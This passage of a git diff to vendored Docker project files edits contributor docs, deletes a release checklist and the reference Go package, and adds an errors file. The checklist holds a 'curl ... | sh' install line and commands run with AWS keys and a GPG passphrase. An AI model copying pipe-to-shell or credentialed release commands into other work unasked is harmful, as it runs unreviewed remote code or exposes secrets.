maintainers + +Maintainers are first and foremost contributors who have shown their +commitment to the long term success of a project. Contributors who want to +become maintainers first demonstrate commitment to the project by contributing +code, reviewing others' work, and triaging issues on a regular basis for at +least three months. + +The contributions alone don't make you a maintainer. You need to earn the +trust of the current maintainers and other project contributors, that your +decisions and actions are in the best interest of the project. + +Periodically, the existing maintainers curate a list of contributors who have +shown regular activity on the project over the prior months. From this +list, maintainer candidates are selected and proposed on the maintainers +mailing list. 
+ +After a candidate is announced on the maintainers mailing list, the +existing maintainers discuss the candidate over the next 5 business days, +provide feedback, and vote. At least 66% of the current maintainers must +vote in the affirmative. + +If a candidate is approved, a maintainer contacts the candidate to +invite them to open a pull request that adds the contributor to +the MAINTAINERS file. The candidate becomes a maintainer once the pull +request is merged. + +### Removing maintainers + +Maintainers can be removed from the project, either at their own request +or due to [project inactivity](#inactive-maintainer-policy). + +#### How to step down + +Life priorities, interests, and passions can change. If you're a maintainer but +feel you must remove yourself from the list, inform other maintainers that you +intend to step down, and if possible, help find someone to pick up your work. +At the very least, ensure your work can be continued where you left off. + +After you've informed other maintainers, create a pull request to remove +yourself from the MAINTAINERS file. + +#### Inactive maintainer policy + +An existing maintainer can be removed if they do not show significant activity +on the project. Periodically, the maintainers review the list of maintainers +and their activity over the last three months. + +If a maintainer has shown insufficient activity over this period, a project +representative will contact the maintainer to ask if they want to continue +being a maintainer. If the maintainer decides to step down as a maintainer, +they open a pull request to be removed from the MAINTAINERS file. + +If the maintainer wants to continue in this role, but is unable to perform the +required duties, they can be removed with a vote by at least 66% of the current +maintainers. The maintainer under discussion will not be allowed to vote. An +e-mail is sent to the mailing list, inviting maintainers of the project to +vote. The voting period is five business days. 
Issues related to a maintainer's
+performance should be discussed with them among the other maintainers so that
+they are not surprised by a pull request removing them. This discussion should
+be handled objectively with no ad hominem attacks.
+
+## Project decision making
+
+Short answer: **Everything is a pull request**.
+
+The Moby core engine project is an open-source project with an open design
+philosophy. This means that the repository is the source of truth for **every**
+aspect of the project, including its philosophy, design, road map, and APIs.
+*If it's part of the project, it's in the repo. If it's in the repo, it's part
+of the project.*
+
+As a result, each decision can be expressed as a change to the repository. An
+implementation change is expressed as a change to the source code. An API
+change is a change to the API specification. A philosophy change is a change
+to the philosophy manifesto, and so on.
+
+All decisions affecting the moby/moby repository, both big and small, follow
+the same steps:
+
+ * **Step 1**: Open a pull request. Anyone can do this.
+
+ * **Step 2**: Discuss the pull request. Anyone can do this.
+
+ * **Step 3**: Maintainers merge, close or reject the pull request.
+
+Pull requests are reviewed by the current maintainers of the moby/moby
+repository. Weekly meetings are organized to synchronously
+discuss tricky PRs, as well as design and architecture decisions. When
+technical agreement cannot be reached among the maintainers of the project,
+escalation or concerns can be raised by opening an issue to be handled
+by the [Moby Technical Steering Committee](https://github.com/moby/tsc).
diff --git a/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md b/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md index 95cb2f1b95..5ef2d317ea 100644 --- a/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md +++ b/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md @@ -30,7 +30,7 @@ reopened when the necessary information is provided. ### 2. Classify the Issue -An issue can have multiple of the following labels. Typically, a properly classified issues should +An issue can have multiple of the following labels. Typically, a properly classified issue should have: - One label identifying its kind (`kind/*`). @@ -42,7 +42,7 @@ have: | Kind | Description | |------------------|---------------------------------------------------------------------------------------------------------------------------------| | kind/bug | Bugs are bugs. The cause may or may not be known at triage time so debugging should be taken account into the time estimate. | -| kind/enhancement | Enhancement are not bugs or new features but can drastically improve usability or performance of a project component. | +| kind/enhancement | Enhancements are not bugs or new features but can drastically improve usability or performance of a project component. | | kind/feature | Functionality or other elements that the project does not currently support. Features are new and shiny. | | kind/question | Contains a user or contributor question requiring a response. | @@ -129,4 +129,4 @@ following labels to indicate their degree of priority (from more urgent to less | priority/P2 | Normal priority: default priority applied. | | priority/P3 | Best effort: those are nice to have / minor issues. | -And that's it. That should be all the information required for a new or existing contributor to come in an resolve an issue. +And that's it. That should be all the information required for a new or existing contributor to come in a resolve an issue. 
diff --git a/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md b/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md index 3763f8798b..458384a3d9 100644 --- a/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md +++ b/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md @@ -30,7 +30,7 @@ docker run --rm -it --privileged \ Sh\*t happens. We know. Below are steps to get out of any "hash-sum mismatch" or "gpg sig error" or the likes error that might happen to the apt repo. -**NOTE:** These are apt repo specific, have had no experimence with anything similar +**NOTE:** These are apt repo specific, have had no experience with anything similar happening to the yum repo in the past so you can rest easy. For each step listed below, move on to the next if the previous didn't work. diff --git a/vendor/github.com/docker/docker/project/PACKAGERS.md b/vendor/github.com/docker/docker/project/PACKAGERS.md index 46ea8e7b20..a5b0018b5a 100644 --- a/vendor/github.com/docker/docker/project/PACKAGERS.md +++ b/vendor/github.com/docker/docker/project/PACKAGERS.md @@ -292,7 +292,7 @@ appropriate for your distro's init script to live there too!). In general, Docker should be run as root, similar to the following: ```bash -docker daemon +dockerd ``` Generally, a `DOCKER_OPTS` variable of some kind is available for adding more diff --git a/vendor/github.com/docker/docker/project/README.md b/vendor/github.com/docker/docker/project/README.md index 3ed68cf297..0eb5e5890f 100644 --- a/vendor/github.com/docker/docker/project/README.md +++ b/vendor/github.com/docker/docker/project/README.md @@ -5,7 +5,7 @@ distributing Docker, specifically: ## Guides -If you're a *contributor* or aspiring contributor, you should read [CONTRIBUTORS.md](../CONTRIBUTING.md). +If you're a *contributor* or aspiring contributor, you should read [CONTRIBUTING.md](../CONTRIBUTING.md). 
If you're a *maintainer* or aspiring maintainer, you should read [MAINTAINERS](../MAINTAINERS). diff --git a/vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md b/vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md deleted file mode 100644 index 84848cae2b..0000000000 --- a/vendor/github.com/docker/docker/project/RELEASE-CHECKLIST.md +++ /dev/null @@ -1,518 +0,0 @@ -# Release Checklist -## A maintainer's guide to releasing Docker - -So you're in charge of a Docker release? Cool. Here's what to do. - -If your experience deviates from this document, please document the changes -to keep it up-to-date. - -It is important to note that this document assumes that the git remote in your -repository that corresponds to "https://github.com/docker/docker" is named -"origin". If yours is not (for example, if you've chosen to name it "upstream" -or something similar instead), be sure to adjust the listed snippets for your -local environment accordingly. If you are not sure what your upstream remote is -named, use a command like `git remote -v` to find out. - -If you don't have an upstream remote, you can add one easily using something -like: - -```bash -export GITHUBUSER="YOUR_GITHUB_USER" -git remote add origin https://github.com/docker/docker.git -git remote add $GITHUBUSER git@github.com:$GITHUBUSER/docker.git -``` - -### 1. Pull from master and create a release branch - -All releases version numbers will be of the form: vX.Y.Z where X is the major -version number, Y is the minor version number and Z is the patch release version number. - -#### Major releases - -The release branch name is just vX.Y because it's going to be the basis for all .Z releases. - -```bash -export BASE=vX.Y -export VERSION=vX.Y.Z -git fetch origin -git checkout --track origin/master -git checkout -b release/$BASE -``` - -This new branch is going to be the base for the release. 
We need to push it to origin so we -can track the cherry-picked changes and the version bump: - -```bash -git push origin release/$BASE -``` - -When you have the major release branch in origin, we need to create the bump fork branch -that we'll push to our fork: - -```bash -git checkout -b bump_$VERSION -``` - -#### Patch releases - -If we have the release branch in origin, we can create the forked bump branch from it directly: - -```bash -export VERSION=vX.Y.Z -export PATCH=vX.Y.Z+1 -git fetch origin -git checkout --track origin/release/$BASE -git checkout -b bump_$PATCH -``` - -We cherry-pick only the commits we want into the bump branch: - -```bash -# get the commits ids we want to cherry-pick -git log -# cherry-pick the commits starting from the oldest one, without including merge commits -git cherry-pick -s -x -git cherry-pick -s -x -... -``` - -### 2. Update the VERSION files and API version on master - -We don't want to stop contributions to master just because we are releasing. -So, after the release branch is up, we bump the VERSION and API version to mark -the start of the "next" release. - -#### 2.1 Update the VERSION files - -Update the content of the `VERSION` file to be the next minor (incrementing Y) -and add the `-dev` suffix. For example, after the release branch for 1.5.0 is -created, the `VERSION` file gets updated to `1.6.0-dev` (as in "1.6.0 in the -making"). - -#### 2.2 Update API version on master - -We don't want API changes to go to the now frozen API version. Create a new -entry in `docs/reference/api/` by copying the latest and bumping the version -number (in both the file's name and content), and submit this in a PR against -master. - -### 3. 
Update CHANGELOG.md - -You can run this command for reference with git 2.0: - -```bash -git fetch --tags -LAST_VERSION=$(git tag -l --sort=-version:refname "v*" | grep -E 'v[0-9\.]+$' | head -1) -git log --stat $LAST_VERSION..bump_$VERSION -``` - -If you don't have git 2.0 but have a sort command that supports `-V`: -```bash -git fetch --tags -LAST_VERSION=$(git tag -l | grep -E 'v[0-9\.]+$' | sort -rV | head -1) -git log --stat $LAST_VERSION..bump_$VERSION -``` - -If releasing a major version (X or Y increased in vX.Y.Z), simply listing notable user-facing features is sufficient. -```markdown -#### Notable features since -* New docker command to do something useful -* Engine API change (deprecating old version) -* Performance improvements in some usecases -* ... -``` - -For minor releases (only Z increases in vX.Y.Z), provide a list of user-facing changes. -Each change should be listed under a category heading formatted as `#### CATEGORY`. - -`CATEGORY` should describe which part of the project is affected. - Valid categories are: - * Builder - * Documentation - * Hack - * Packaging - * Engine API - * Runtime - * Other (please use this category sparingly) - -Each change should be formatted as `BULLET DESCRIPTION`, given: - -* BULLET: either `-`, `+` or `*`, to indicate a bugfix, new feature or - upgrade, respectively. - -* DESCRIPTION: a concise description of the change that is relevant to the - end-user, using the present tense. Changes should be described in terms - of how they affect the user, for example "Add new feature X which allows Y", - "Fix bug which caused X", "Increase performance of Y". - -EXAMPLES: - -```markdown -## 0.3.6 (1995-12-25) - -#### Builder - -+ 'docker build -t FOO .' 
applies the tag FOO to the newly built image - -#### Engine API - -- Fix a bug in the optional unix socket transport - -#### Runtime - -* Improve detection of kernel version -``` - -If you need a list of contributors between the last major release and the -current bump branch, use something like: -```bash -git log --format='%aN <%aE>' v0.7.0...bump_v0.8.0 | sort -uf -``` -Obviously, you'll need to adjust version numbers as necessary. If you just need -a count, add a simple `| wc -l`. - -### 4. Change the contents of the VERSION file - -Before the big thing, you'll want to make successive release candidates and get -people to test. The release candidate number `N` should be part of the version: - -```bash -export RC_VERSION=${VERSION}-rcN -echo ${RC_VERSION#v} > VERSION -``` - -### 5. Test the docs - -Make sure that your tree includes documentation for any modified or -new features, syntax or semantic changes. - -To test locally: - -```bash -make docs -``` - -To make a shared test at https://beta-docs.docker.io: - -(You will need the `awsconfig` file added to the `docs/` dir) - -```bash -make AWS_S3_BUCKET=beta-docs.docker.io BUILD_ROOT=yes docs-release -``` - -### 6. Commit and create a pull request to the "release" branch - -```bash -git add VERSION CHANGELOG.md -git commit -m "Bump version to $VERSION" -git push $GITHUBUSER bump_$VERSION -echo "https://github.com/$GITHUBUSER/docker/compare/docker:release/$BASE...$GITHUBUSER:bump_$VERSION?expand=1" -``` - -That last command will give you the proper link to visit to ensure that you -open the PR against the "release" branch instead of accidentally against -"master" (like so many brave souls before you already have). - -### 7. Create a PR to update the AUTHORS file for the release - -Update the AUTHORS file, by running the `hack/generate-authors.sh` on the -release branch. To prevent duplicate entries, you may need to update the -`.mailmap` file accordingly. - -### 8. 
Build release candidate rpms and debs - -**NOTE**: It will be a lot faster if you pass a different graphdriver with -`DOCKER_GRAPHDRIVER` than `vfs`. - -```bash -docker build -t docker . -docker run \ - --rm -t --privileged \ - -e DOCKER_GRAPHDRIVER=aufs \ - -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \ - docker \ - hack/make.sh binary build-deb build-rpm -``` - -### 9. Publish release candidate rpms and debs - -With the rpms and debs you built from the last step you can release them on the -same server, or ideally, move them to a dedicated release box via scp into -another docker/docker directory in bundles. This next step assumes you have -a checkout of the docker source code at the same commit you used to build, with -the artifacts from the last step in `bundles`. - -**NOTE:** If you put a space before the command your `.bash_history` will not -save it. (for the `GPG_PASSPHRASE`). - -```bash -docker build -t docker . -docker run --rm -it --privileged \ - -v /volumes/repos:/volumes/repos \ - -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \ - -v $HOME/.gnupg:/root/.gnupg \ - -e DOCKER_RELEASE_DIR=/volumes/repos \ - -e GPG_PASSPHRASE \ - -e KEEPBUNDLE=1 \ - docker \ - hack/make.sh release-deb release-rpm sign-repos generate-index-listing -``` - -### 10. Upload the changed repos to wherever you host - -For example, above we bind mounted `/volumes/repos` as the storage for -`DOCKER_RELEASE_DIR`. In this case `/volumes/repos/apt` can be synced with -a specific s3 bucket for the apt repo and `/volumes/repos/yum` can be synced with -a s3 bucket for the yum repo. - -### 11. Publish release candidate binaries - -To run this you will need access to the release credentials. Get them from the -Core maintainers. - -```bash -docker build -t docker . 
- -# static binaries are still pushed to s3 -docker run \ - -e AWS_S3_BUCKET=test.docker.com \ - -e AWS_ACCESS_KEY_ID \ - -e AWS_SECRET_ACCESS_KEY \ - -e AWS_DEFAULT_REGION \ - -i -t --privileged \ - docker \ - hack/release.sh -``` - -It will run the test suite, build the binaries and upload to the specified bucket, -so this is a good time to verify that you're running against **test**.docker.com. - -### 12. Purge the cache! - -After the binaries are uploaded to test.docker.com and the packages are on -apt.dockerproject.org and yum.dockerproject.org, make sure -they get tested in both Ubuntu and Debian for any obvious installation -issues or runtime issues. - -If everything looks good, it's time to create a git tag for this candidate: - -```bash -git tag -a $RC_VERSION -m $RC_VERSION bump_$VERSION -git push origin $RC_VERSION -``` - -Announcing on multiple medias is the best way to get some help testing! An easy -way to get some useful links for sharing: - -```bash -echo "Ubuntu/Debian: curl -sSL https://test.docker.com/ | sh" -echo "Linux 64bit binary: https://test.docker.com/builds/Linux/x86_64/docker-${VERSION#v}" -echo "Darwin/OSX 64bit client binary: https://test.docker.com/builds/Darwin/x86_64/docker-${VERSION#v}" -echo "Linux 64bit tgz: https://test.docker.com/builds/Linux/x86_64/docker-${VERSION#v}.tgz" -echo "Windows 64bit client binary: https://test.docker.com/builds/Windows/x86_64/docker-${VERSION#v}.exe" -echo "Windows 32bit client binary: https://test.docker.com/builds/Windows/i386/docker-${VERSION#v}.exe" -``` - -We recommend announcing the release candidate on: - -- IRC on #docker, #docker-dev, #docker-maintainers -- In a comment on the pull request to notify subscribed people on GitHub -- The [docker-dev](https://groups.google.com/forum/#!forum/docker-dev) group -- The [docker-maintainers](https://groups.google.com/a/dockerproject.org/forum/#!forum/maintainers) group -- Any social media that can bring some attention to the release candidate - -### 
13. Iterate on successive release candidates - -Spend several days along with the community explicitly investing time and -resources to try and break Docker in every possible way, documenting any -findings pertinent to the release. This time should be spent testing and -finding ways in which the release might have caused various features or upgrade -environments to have issues, not coding. During this time, the release is in -code freeze, and any additional code changes will be pushed out to the next -release. - -It should include various levels of breaking Docker, beyond just using Docker -by the book. - -Any issues found may still remain issues for this release, but they should be -documented and give appropriate warnings. - -During this phase, the `bump_$VERSION` branch will keep evolving as you will -produce new release candidates. The frequency of new candidates is up to the -release manager: use your best judgement taking into account the severity of -reported issues, testers availability, and time to scheduled release date. - -Each time you'll want to produce a new release candidate, you will start by -adding commits to the branch, usually by cherry-picking from master: - -```bash -git cherry-pick -s -x -m0 -``` - -You want your "bump commit" (the one that updates the CHANGELOG and VERSION -files) to remain on top, so you'll have to `git rebase -i` to bring it back up. - -Now that your bump commit is back on top, you will need to update the CHANGELOG -file (if appropriate for this particular release candidate), and update the -VERSION file to increment the RC number: - -```bash -export RC_VERSION=$VERSION-rcN -echo $RC_VERSION > VERSION -``` - -You can now amend your last commit and update the bump branch: - -```bash -git commit --amend -git push -f $GITHUBUSER bump_$VERSION -``` - -Repeat step 6 to tag the code, publish new binaries, announce availability, and -get help testing. - -### 14. 
Finalize the bump branch - -When you're happy with the quality of a release candidate, you can move on and -create the real thing. - -You will first have to amend the "bump commit" to drop the release candidate -suffix in the VERSION file: - -```bash -echo $VERSION > VERSION -git add VERSION -git commit --amend -``` - -You will then repeat step 6 to publish the binaries to test - -### 15. Get 2 other maintainers to validate the pull request - -### 16. Build final rpms and debs - -```bash -docker build -t docker . -docker run \ - --rm -t --privileged \ - -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \ - docker \ - hack/make.sh binary build-deb build-rpm -``` - -### 17. Publish final rpms and debs - -With the rpms and debs you built from the last step you can release them on the -same server, or ideally, move them to a dedicated release box via scp into -another docker/docker directory in bundles. This next step assumes you have -a checkout of the docker source code at the same commit you used to build, with -the artifacts from the last step in `bundles`. - -**NOTE:** If you put a space before the command your `.bash_history` will not -save it. (for the `GPG_PASSPHRASE`). - -```bash -docker build -t docker . -docker run --rm -it --privileged \ - -v /volumes/repos:/volumes/repos \ - -v $(pwd)/bundles:/go/src/github.com/docker/docker/bundles \ - -v $HOME/.gnupg:/root/.gnupg \ - -e DOCKER_RELEASE_DIR=/volumes/repos \ - -e GPG_PASSPHRASE \ - -e KEEPBUNDLE=1 \ - docker \ - hack/make.sh release-deb release-rpm sign-repos generate-index-listing -``` - -### 18. Upload the changed repos to wherever you host - -For example, above we bind mounted `/volumes/repos` as the storage for -`DOCKER_RELEASE_DIR`. In this case `/volumes/repos/apt` can be synced with -a specific s3 bucket for the apt repo and `/volumes/repos/yum` can be synced with -a s3 bucket for the yum repo. - -### 19. 
Publish final binaries - -Once they're tested and reasonably believed to be working, run against -get.docker.com: - -```bash -docker build -t docker . -# static binaries are still pushed to s3 -docker run \ - -e AWS_S3_BUCKET=get.docker.com \ - -e AWS_ACCESS_KEY_ID \ - -e AWS_SECRET_ACCESS_KEY \ - -e AWS_DEFAULT_REGION \ - -i -t --privileged \ - docker \ - hack/release.sh -``` - -### 20. Purge the cache! - -### 21. Apply tag and create release - -It's very important that we don't make the tag until after the official -release is uploaded to get.docker.com! - -```bash -git tag -a $VERSION -m $VERSION bump_$VERSION -git push origin $VERSION -``` - -Once the tag is pushed, go to GitHub and create a [new release](https://github.com/docker/docker/releases/new). -If the tag is for an RC make sure you check `This is a pre-release` at the bottom of the form. - -Select the tag that you just pushed as the version and paste the changelog in the description of the release. -You can see examples in this two links: - -https://github.com/docker/docker/releases/tag/v1.8.0 -https://github.com/docker/docker/releases/tag/v1.8.0-rc3 - -### 22. Go to github to merge the `bump_$VERSION` branch into release - -Don't forget to push that pretty blue button to delete the leftover -branch afterwards! - -### 23. Update the docs branch - -You will need to point the docs branch to the newly created release tag: - -```bash -git checkout origin/docs -git reset --hard origin/$VERSION -git push -f origin docs -``` - -The docs will appear on https://docs.docker.com/ (though there may be cached -versions, so its worth checking http://docs.docker.com.s3-website-us-east-1.amazonaws.com/). -For more information about documentation releases, see `docs/README.md`. - -Note that the new docs will not appear live on the site until the cache (a complex, -distributed CDN system) is flushed. 
The `make docs-release` command will do this -_if_ the `DISTRIBUTION_ID` is set correctly - this will take at least 15 minutes to run -and you can check its progress with the CDN Cloudfront Chrome addon. - -### 24. Create a new pull request to merge your bump commit back into master - -```bash -git checkout master -git fetch -git reset --hard origin/master -git cherry-pick -s -x $VERSION -git push $GITHUBUSER merge_release_$VERSION -echo "https://github.com/$GITHUBUSER/docker/compare/docker:master...$GITHUBUSER:merge_release_$VERSION?expand=1" -``` - -Again, get two maintainers to validate, then merge, then push that pretty -blue button to delete your branch. - -### 25. Rejoice and Evangelize! - -Congratulations! You're done. - -Go forth and announce the glad tidings of the new release in `#docker`, -`#docker-dev`, on the [dev mailing list](https://groups.google.com/forum/#!forum/docker-dev), -the [announce mailing list](https://groups.google.com/forum/#!forum/docker-announce), -and on Twitter! diff --git a/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md b/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md index d764e9d007..8270a6efb3 100644 --- a/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md +++ b/vendor/github.com/docker/docker/project/RELEASE-PROCESS.md @@ -45,7 +45,7 @@ defined by a ROADMAP.md file at the root of the repository). - The earlier a PR is opened, the more time the maintainers have to review. For example, if a PR is opened the day before the freeze date, it’s very unlikely that it will be merged for the release. -- Constant communication with the maintainers (mailing-list, IRC, Github issues, +- Constant communication with the maintainers (mailing-list, IRC, GitHub issues, etc.) allows to get early feedback on the design before getting into the implementation, which usually reduces the time needed to discuss a changeset. 
- If the code is commented, fully tested and by extension follows every single diff --git a/vendor/github.com/docker/docker/project/REVIEWING.md b/vendor/github.com/docker/docker/project/REVIEWING.md index 51ef4c59de..cac3f5d7d4 100644 --- a/vendor/github.com/docker/docker/project/REVIEWING.md +++ b/vendor/github.com/docker/docker/project/REVIEWING.md @@ -68,7 +68,7 @@ the next appropriate stage: - Has DCO - Contains sufficient justification (e.g., usecases) for the proposed change - - References the Github issue it fixes (if any) in the commit or the first Github comment + - References the GitHub issue it fixes (if any) in the commit or the first GitHub comment Possible transitions from this state: diff --git a/vendor/github.com/docker/docker/project/TOOLS.md b/vendor/github.com/docker/docker/project/TOOLS.md index 26303c3021..dda0fc0342 100644 --- a/vendor/github.com/docker/docker/project/TOOLS.md +++ b/vendor/github.com/docker/docker/project/TOOLS.md @@ -17,7 +17,7 @@ GitHub pull requests. Leeroy uses [GitHub hooks](https://developer.github.com/v3/repos/hooks/) to listen for pull request notifications and starts jobs on your Jenkins server. Using the Jenkins -[notification plugin][https://wiki.jenkins-ci.org/display/JENKINS/Notification+Plugin], +[notification plugin](https://wiki.jenkins-ci.org/display/JENKINS/Notification+Plugin), Leeroy updates the pull request using GitHub's [status API](https://developer.github.com/v3/repos/statuses/) with pending, success, failure, or error statuses. 
diff --git a/vendor/github.com/docker/docker/reference/errors.go b/vendor/github.com/docker/docker/reference/errors.go new file mode 100644 index 0000000000..2d294c672e --- /dev/null +++ b/vendor/github.com/docker/docker/reference/errors.go @@ -0,0 +1,25 @@ +package reference // import "github.com/docker/docker/reference" + +type notFoundError string + +func (e notFoundError) Error() string { + return string(e) +} + +func (notFoundError) NotFound() {} + +type invalidTagError string + +func (e invalidTagError) Error() string { + return string(e) +} + +func (invalidTagError) InvalidParameter() {} + +type conflictingTagError string + +func (e conflictingTagError) Error() string { + return string(e) +} + +func (conflictingTagError) Conflict() {} diff --git a/vendor/github.com/docker/docker/reference/reference.go b/vendor/github.com/docker/docker/reference/reference.go deleted file mode 100644 index 996fc50704..0000000000 --- a/vendor/github.com/docker/docker/reference/reference.go +++ /dev/null @@ -1,216 +0,0 @@ -package reference - -import ( - "errors" - "fmt" - "strings" - - "github.com/docker/distribution/digest" - distreference "github.com/docker/distribution/reference" - "github.com/docker/docker/image/v1" -) - -const ( - // DefaultTag defines the default tag used when performing images related actions and no tag or digest is specified - DefaultTag = "latest" - // DefaultHostname is the default built-in hostname - DefaultHostname = "docker.io" - // LegacyDefaultHostname is automatically converted to DefaultHostname - LegacyDefaultHostname = "index.docker.io" - // DefaultRepoPrefix is the prefix used for default repositories in default host - DefaultRepoPrefix = "library/" -) - -// Named is an object with a full name -type Named interface { - // Name returns normalized repository name, like "ubuntu". - Name() string - // String returns full reference, like "ubuntu@sha256:abcdef..." 
- String() string - // FullName returns full repository name with hostname, like "docker.io/library/ubuntu" - FullName() string - // Hostname returns hostname for the reference, like "docker.io" - Hostname() string - // RemoteName returns the repository component of the full name, like "library/ubuntu" - RemoteName() string -} - -// NamedTagged is an object including a name and tag. -type NamedTagged interface { - Named - Tag() string -} - -// Canonical reference is an object with a fully unique -// name including a name with hostname and digest -type Canonical interface { - Named - Digest() digest.Digest -} - -// ParseNamed parses s and returns a syntactically valid reference implementing -// the Named interface. The reference must have a name, otherwise an error is -// returned. -// If an error was encountered it is returned, along with a nil Reference. -func ParseNamed(s string) (Named, error) { - named, err := distreference.ParseNamed(s) - if err != nil { - return nil, fmt.Errorf("Error parsing reference: %q is not a valid repository/tag: %s", s, err) - } - r, err := WithName(named.Name()) - if err != nil { - return nil, err - } - if canonical, isCanonical := named.(distreference.Canonical); isCanonical { - return WithDigest(r, canonical.Digest()) - } - if tagged, isTagged := named.(distreference.NamedTagged); isTagged { - return WithTag(r, tagged.Tag()) - } - return r, nil -} - -// TrimNamed removes any tag or digest from the named reference -func TrimNamed(ref Named) Named { - return &namedRef{distreference.TrimNamed(ref)} -} - -// WithName returns a named object representing the given string. If the input -// is invalid ErrReferenceInvalidFormat will be returned. 
-func WithName(name string) (Named, error) { - name, err := normalize(name) - if err != nil { - return nil, err - } - if err := validateName(name); err != nil { - return nil, err - } - r, err := distreference.WithName(name) - if err != nil { - return nil, err - } - return &namedRef{r}, nil -} - -// WithTag combines the name from "name" and the tag from "tag" to form a -// reference incorporating both the name and the tag. -func WithTag(name Named, tag string) (NamedTagged, error) { - r, err := distreference.WithTag(name, tag) - if err != nil { - return nil, err - } - return &taggedRef{namedRef{r}}, nil -} - -// WithDigest combines the name from "name" and the digest from "digest" to form -// a reference incorporating both the name and the digest. -func WithDigest(name Named, digest digest.Digest) (Canonical, error) { - r, err := distreference.WithDigest(name, digest) - if err != nil { - return nil, err - } - return &canonicalRef{namedRef{r}}, nil -} - -type namedRef struct { - distreference.Named -} -type taggedRef struct { - namedRef -} -type canonicalRef struct { - namedRef -} - -func (r *namedRef) FullName() string { - hostname, remoteName := splitHostname(r.Name()) - return hostname + "/" + remoteName -} -func (r *namedRef) Hostname() string { - hostname, _ := splitHostname(r.Name()) - return hostname -} -func (r *namedRef) RemoteName() string { - _, remoteName := splitHostname(r.Name()) - return remoteName -} -func (r *taggedRef) Tag() string { - return r.namedRef.Named.(distreference.NamedTagged).Tag() -} -func (r *canonicalRef) Digest() digest.Digest { - return r.namedRef.Named.(distreference.Canonical).Digest() -} - -// WithDefaultTag adds a default tag to a reference if it only has a repo name. -func WithDefaultTag(ref Named) Named { - if IsNameOnly(ref) { - ref, _ = WithTag(ref, DefaultTag) - } - return ref -} - -// IsNameOnly returns true if reference only contains a repo name. 
-func IsNameOnly(ref Named) bool { - if _, ok := ref.(NamedTagged); ok { - return false - } - if _, ok := ref.(Canonical); ok { - return false - } - return true -} - -// ParseIDOrReference parses string for an image ID or a reference. ID can be -// without a default prefix. -func ParseIDOrReference(idOrRef string) (digest.Digest, Named, error) { - if err := v1.ValidateID(idOrRef); err == nil { - idOrRef = "sha256:" + idOrRef - } - if dgst, err := digest.ParseDigest(idOrRef); err == nil { - return dgst, nil, nil - } - ref, err := ParseNamed(idOrRef) - return "", ref, err -} - -// splitHostname splits a repository name to hostname and remotename string. -// If no valid hostname is found, the default hostname is used. Repository name -// needs to be already validated before. -func splitHostname(name string) (hostname, remoteName string) { - i := strings.IndexRune(name, '/') - if i == -1 || (!strings.ContainsAny(name[:i], ".:") && name[:i] != "localhost") { - hostname, remoteName = DefaultHostname, name - } else { - hostname, remoteName = name[:i], name[i+1:] - } - if hostname == LegacyDefaultHostname { - hostname = DefaultHostname - } - if hostname == DefaultHostname && !strings.ContainsRune(remoteName, '/') { - remoteName = DefaultRepoPrefix + remoteName - } - return -} - -// normalize returns a repository name in its normalized form, meaning it -// will not contain default hostname nor library/ prefix for official images. 
-func normalize(name string) (string, error) { - host, remoteName := splitHostname(name) - if strings.ToLower(remoteName) != remoteName { - return "", errors.New("invalid reference format: repository name must be lowercase") - } - if host == DefaultHostname { - if strings.HasPrefix(remoteName, DefaultRepoPrefix) { - return strings.TrimPrefix(remoteName, DefaultRepoPrefix), nil - } - return remoteName, nil - } - return name, nil -} - -func validateName(name string) error { - if err := v1.ValidateID(name); err == nil { - return fmt.Errorf("Invalid repository name (%s), cannot specify 64-byte hexadecimal strings", name) - } - return nil -} diff --git a/vendor/github.com/docker/docker/reference/reference_test.go b/vendor/github.com/docker/docker/reference/reference_test.go deleted file mode 100644 index ff35ba3da2..0000000000 --- a/vendor/github.com/docker/docker/reference/reference_test.go +++ /dev/null @@ -1,275 +0,0 @@ -package reference - -import ( - "testing" - - "github.com/docker/distribution/digest" -) - -func TestValidateReferenceName(t *testing.T) { - validRepoNames := []string{ - "docker/docker", - "library/debian", - "debian", - "docker.io/docker/docker", - "docker.io/library/debian", - "docker.io/debian", - "index.docker.io/docker/docker", - "index.docker.io/library/debian", - "index.docker.io/debian", - "127.0.0.1:5000/docker/docker", - "127.0.0.1:5000/library/debian", - "127.0.0.1:5000/debian", - "thisisthesongthatneverendsitgoesonandonandonthisisthesongthatnev", - } - invalidRepoNames := []string{ - "https://github.com/docker/docker", - "docker/Docker", - "-docker", - "-docker/docker", - "-docker.io/docker/docker", - "docker///docker", - "docker.io/docker/Docker", - "docker.io/docker///docker", - "1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a", - "docker.io/1a3f5e7d9c1b3a5f7e9d1c3b5a7f9e1d3c5b7a9f1e3d5d7c9b1a3f5e7d9c1b3a", - } - - for _, name := range invalidRepoNames { - _, err := ParseNamed(name) - if err == nil { - 
